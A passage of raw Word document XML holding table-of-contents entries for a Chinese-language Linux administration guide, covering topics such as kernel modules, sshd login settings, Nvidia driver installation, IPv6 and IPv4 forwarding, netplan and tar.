            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>lsmod</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779662 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>161</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C22D41E" w14:textId="2A787B0A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779663" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>modprobe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779663 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>161</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F305EFC" w14:textId="02604338" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779664" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>sshd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779664 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>162</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3DB8CC74" w14:textId="4BE7264E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779665" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>允许</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>用户远程登录</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779665 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>162</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75884EFC" w14:textId="102E552B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779666" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>允许无密码登录</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779666 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>162</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="094B1961" w14:textId="420A092D" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779667" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安装</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Nvidia</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>卡</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779667 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>162</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21194D38" w14:textId="491ABEDE" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779668" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>正确情况后的内核查询</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779668 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>162</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62B432E9" w14:textId="2241638B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779669" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>不正确情况的内核查询</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779669 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>163</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3611FF1E" w14:textId="3AE6B3EB" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779670" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>鹏哥安装显卡的的命令记录</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779670 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>163</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B750002" w14:textId="6CB34CC2" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779671" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>nvidia-xconfig</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：显卡对屏幕的输出</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779671 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>165</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="028E2BF7" w14:textId="7C1FC1F0" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779672" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>nvidia-modprobe</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：手动加载</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Nvidia</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>显卡内核模块（即驱动）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779672 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>165</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2339511D" w14:textId="60FEE87B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779673" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>关闭</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IPv6</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>开启</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IPv4 Forward</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779673 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>165</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68E989B8" w14:textId="49A55127" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779674" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>关闭</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IPv6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779674 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>166</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="625553EC" w14:textId="28FF4BB5" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779675" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>开启</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IPv4 Forward</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779675 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>166</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E817D24" w14:textId="04FF7C7C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779676" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>重启网络：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ubuntu</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>netplan</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779676 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>166</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48AACA4F" w14:textId="535928BB" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779677" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>压缩包操作</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779677 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>167</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B2018D5" w14:textId="202B15F1" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779678" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>tar</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的压缩与解压缩</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779678 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>167</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
